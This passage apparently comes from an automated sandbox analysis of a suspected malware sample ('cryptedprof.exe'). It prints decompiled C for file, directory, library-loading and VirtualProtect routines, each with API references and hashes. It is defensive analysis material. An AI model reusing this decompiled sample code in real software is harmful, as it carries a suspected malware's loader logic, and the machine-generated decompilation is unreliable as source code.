				_t13 = E00405C7E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C10(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058B7(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D4(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583A(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624D("C:\\Users\\engineer\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                                                        0x004015bb
                                                                                        0x004015c2
                                                                                        0x004015c5
                                                                                        0x004015ca
                                                                                        0x004015ce
                                                                                        0x004015d0
                                                                                        0x004015d8
                                                                                        0x004015da
                                                                                        0x004015dc
                                                                                        0x004015e0
                                                                                        0x004015e3
                                                                                        0x004015fb
                                                                                        0x004015fc
                                                                                        0x004015e5
                                                                                        0x004015e5
                                                                                        0x004015e8
                                                                                        0x00000000
                                                                                        0x004015f3
                                                                                        0x004015f4
                                                                                        0x004015f4
                                                                                        0x004015e8
                                                                                        0x00401603
                                                                                        0x0040160a
                                                                                        0x00401617
                                                                                        0x00401617
                                                                                        0x0040160c
                                                                                        0x0040160d
                                                                                        0x00401615
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00401615
                                                                                        0x0040160a
                                                                                        0x0040161a
                                                                                        0x0040161d
                                                                                        0x0040161f
                                                                                        0x00401620
                                                                                        0x004015d0
                                                                                        0x00401627
                                                                                        0x00401652
                                                                                        0x004022dd
                                                                                        0x00401629
                                                                                        0x0040162b
                                                                                        0x00401636
                                                                                        0x0040163c
                                                                                        0x00401644
                                                                                        0x0040164a
                                                                                        0x0040164a
                                                                                        0x00401644
                                                                                        0x00402a5d
                                                                                        0x00402a69

                                                                                        APIs
                                                                                          • Part of subcall function 00405C7E: CharNextA.USER32(?,?,0042BCC0,?,00405CEA,0042BCC0,0042BCC0,747DFA90,?,747DF560,00405A35,?,747DFA90,747DF560,00000000), ref: 00405C8C
                                                                                          • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405C91
                                                                                          • Part of subcall function 00405C7E: CharNextA.USER32(00000000), ref: 00405CA5
                                                                                        • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                          • Part of subcall function 0040583A: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                        • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                        Strings
                                                                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp
                                                                                        • API String ID: 1892508949-1104044542
                                                                                        • Opcode ID: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                        • Instruction ID: 4524d263cfc656ab508a586836abab8f1c5f66e1bf0f475862462bf062351d6a
                                                                                        • Opcode Fuzzy Hash: 7ff3cc2b926c6297edec63cbc636cf3b39d6050f92e52d10b90d41301032bc1b
                                                                                        • Instruction Fuzzy Hash: C7110832108141EBDB307FA54D409BF37B49A92314B28457FE591B22E3D63C4942962E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 70992921, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x70994038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7099404c, 4, 0x40, 0x7099403c); // executed
					 *0x7099404c = 0xc2;
					 *0x7099403c = 0;
					 *0x70994044 = 0;
					 *0x70994058 = 0;
					 *0x70994048 = 0;
					 *0x70994040 = 0;
					 *0x70994050 = 0;
					 *0x7099404e = 0;
				}
				return 1;
			}



                                                                                        0x7099292a
                                                                                        0x7099292f
                                                                                        0x7099293f
                                                                                        0x70992947
                                                                                        0x7099294e
                                                                                        0x70992953
                                                                                        0x70992958
                                                                                        0x7099295d
                                                                                        0x70992962
                                                                                        0x70992967
                                                                                        0x7099296c
                                                                                        0x7099296c
                                                                                        0x70992974

                                                                                        APIs
                                                                                        • VirtualProtect.KERNELBASE(7099404C,00000004,00000040,7099403C), ref: 7099293F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID: `gxt@Mxt
                                                                                        • API String ID: 544645111-1126417519
                                                                                        • Opcode ID: f54602752558335b86aa6433fbe4a89203ceaedddd31c938d4cc5700b4fb4453
                                                                                        • Instruction ID: 46aee05e8681868d0db4e2704c79bac87f9bb144acf9b02bb7838e39c1a93931
                                                                                        • Opcode Fuzzy Hash: f54602752558335b86aa6433fbe4a89203ceaedddd31c938d4cc5700b4fb4453
                                                                                        • Instruction Fuzzy Hash: 08F098B353C240DEC362CF6A8C55F153EE4A3D9258B21453BE758F6261E3B44444AF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004031B7, Relevance: 3.1, APIs: 2, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 92%
                                                                                        			E004031B7(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42f4b8;
					 *0x429464 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E004032BF(4);
				if(_t22 >= 0) {
					_t24 = E00405E5E( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x429464 =  *0x429464 + 4;
						_t36 = E004032BF(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x429464 =  *0x429464 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E00405E5E( *0x40a01c, 0x41d460, _t28) == 0) {
											goto L18;
										}
										_t30 = E00405E8D(_a8, 0x41d460, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x429464 =  *0x429464 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                                                                                        0x004031bb
                                                                                        0x004031c4
                                                                                        0x004031cd
                                                                                        0x004031d1
                                                                                        0x004031dc
                                                                                        0x004031dc
                                                                                        0x004031e4
                                                                                        0x004031eb
                                                                                        0x004031fd
                                                                                        0x00403204
                                                                                        0x004032a9
                                                                                        0x004032a9
                                                                                        0x00000000
                                                                                        0x0040320a
                                                                                        0x0040320d
                                                                                        0x00403219
                                                                                        0x0040321d
                                                                                        0x004032b7
                                                                                        0x004032b7
                                                                                        0x00403223
                                                                                        0x00403226
                                                                                        0x00403285
                                                                                        0x0040328b
                                                                                        0x0040328d
                                                                                        0x0040328d
                                                                                        0x0040329f
                                                                                        0x004032a7
                                                                                        0x004032ae
                                                                                        0x004032b1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403228
                                                                                        0x0040322b
                                                                                        0x00000000
                                                                                        0x00403231
                                                                                        0x00403236
                                                                                        0x0040323d
                                                                                        0x00403240
                                                                                        0x00403242
                                                                                        0x00403242
                                                                                        0x0040324f
                                                                                        0x00403259
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403262
                                                                                        0x00403269
                                                                                        0x00403281
                                                                                        0x004032ab
                                                                                        0x004032ab
                                                                                        0x0040326b
                                                                                        0x0040326b
                                                                                        0x0040326e
                                                                                        0x00403271
                                                                                        0x00403277
                                                                                        0x0040327d
                                                                                        0x00000000
                                                                                        0x0040327f
                                                                                        0x00000000
                                                                                        0x0040327f
                                                                                        0x0040327d
                                                                                        0x00000000
                                                                                        0x00403269
                                                                                        0x00000000
                                                                                        0x00403236
                                                                                        0x0040322b
                                                                                        0x00403226
                                                                                        0x0040321d
                                                                                        0x00403204
                                                                                        0x004032b9
                                                                                        0x004032bc

                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 004031DC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                        • Instruction ID: f7a06b24e1bdd84e59f3f5cc49a67b6726d22d07d12c3136825aaea33ef0281b
                                                                                        • Opcode Fuzzy Hash: 895b742663fe89ff2a238797a908e629badaab513ccad9f8b1a037716250395c
                                                                                        • Instruction Fuzzy Hash: 91318D70200218EFDB109F95DD44A9A3BACEB04759F1044BEF905E61A0D3389E51DBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 59%
                                                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42f490;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42ec2c =  *0x42ec2c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec2c, 0x7530,  *0x42ec14), 0);
					}
				}
				return 0;
			}











                                                                                        0x0040138a
                                                                                        0x004013fa
                                                                                        0x0040139b
                                                                                        0x004013a0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004013a2
                                                                                        0x004013a3
                                                                                        0x004013ad
                                                                                        0x00000000
                                                                                        0x00401404
                                                                                        0x004013b0
                                                                                        0x004013b7
                                                                                        0x004013bd
                                                                                        0x004013be
                                                                                        0x004013c0
                                                                                        0x004013c2
                                                                                        0x004013b9
                                                                                        0x004013b9
                                                                                        0x004013ba
                                                                                        0x004013ba
                                                                                        0x004013c9
                                                                                        0x004013cb
                                                                                        0x004013f4
                                                                                        0x004013f4
                                                                                        0x004013c9
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 3850602802-0
                                                                                        • Opcode ID: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                        • Instruction ID: 4ffa91c62993149d5f3561e9fd219417dede2ec5d116c30815b8555db40bf4f7
                                                                                        • Opcode Fuzzy Hash: 4efff27b407571731b33070943e5e1db077ec5294c94e6701788801526c55692
                                                                                        • Instruction Fuzzy Hash: 480121317242109BE7184B7A8D04B6A32A8E710318F10853AF841F61F1DA789C028B4C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406656, Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00406656(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a258);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
				}
				_t5 = E004065E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                                                        0x0040665e
                                                                                        0x00406661
                                                                                        0x00406668
                                                                                        0x00406670
                                                                                        0x0040667c
                                                                                        0x00000000
                                                                                        0x00406683
                                                                                        0x00406673
                                                                                        0x0040667a
                                                                                        0x00000000
                                                                                        0x0040668b
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406683
                                                                                          • Part of subcall function 004065E8: GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                                          • Part of subcall function 004065E8: wsprintfA.USER32 ref: 00406638
                                                                                          • Part of subcall function 004065E8: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2547128583-0
                                                                                        • Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                        • Instruction ID: a5acf963d4dc7277efada4342fe0793da34265ba7e3dd7efcecf40f1b2e2af73
                                                                                        • Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
                                                                                        • Instruction Fuzzy Hash: 48E086326042106AD6106B705E0497773A89F847103034D3EF94AF2140D739DC31966D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405DE6, Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 68%
                                                                                        			E00405DE6(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                                                        0x00405dea
                                                                                        0x00405df7
                                                                                        0x00405e0c
                                                                                        0x00405e12

                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405DEA
                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate
                                                                                        • String ID:
                                                                                        • API String ID: 415043291-0
                                                                                        • Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                        • Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
                                                                                        • Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
                                                                                        • Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405DC1(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                                                        0x00405dc6
                                                                                        0x00405dcc
                                                                                        0x00405dd1
                                                                                        0x00405dda
                                                                                        0x00405dda
                                                                                        0x00405de3

                                                                                        APIs
                                                                                        • GetFileAttributesA.KERNELBASE(?,?,004059D9,?,?,00000000,00405BBC,?,?,?,?), ref: 00405DC6
                                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AttributesFile
                                                                                        • String ID:
                                                                                        • API String ID: 3188754299-0
                                                                                        • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                        • Instruction ID: cf7f7f764d64860b039e5252603fd5f93999e207008e06c25ada038bd68c9de4
                                                                                        • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                                        • Instruction Fuzzy Hash: 16D0C976504421AFC2112728AE0C89BBB55DB542B1702CA36FDA5A26B2DB304C569A98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004058B7, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004058B7(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                                                        0x004058bd
                                                                                        0x004058c5
                                                                                        0x00000000
                                                                                        0x004058cb
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,00403479,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004058BD
                                                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                        • String ID:
                                                                                        • API String ID: 1375471231-0
                                                                                        • Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                                        • Instruction ID: 533fd4e2b3ea02dfd4e86ffada44851bb532735a7b96714f173b1300ab50f423
                                                                                        • Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
                                                                                        • Instruction Fuzzy Hash: 53C04C31214A019BE6506B319F09B177BA4AF50741F118439678AF01A1DB34846ADA6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405E5E, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405E5E(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                        0x00405e62
                                                                                        0x00405e72
                                                                                        0x00405e7a
                                                                                        0x00000000
                                                                                        0x00405e81
                                                                                        0x00000000
                                                                                        0x00405e83

                                                                                        APIs
                                                                                        • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                                        • Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
                                                                                        • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                                                        • Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405E8D, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405E8D(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                        0x00405e91
                                                                                        0x00405ea1
                                                                                        0x00405ea9
                                                                                        0x00000000
                                                                                        0x00405eb0
                                                                                        0x00000000
                                                                                        0x00405eb2

                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041797F,00415460,004033BF,00415460,0041797F,NA,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
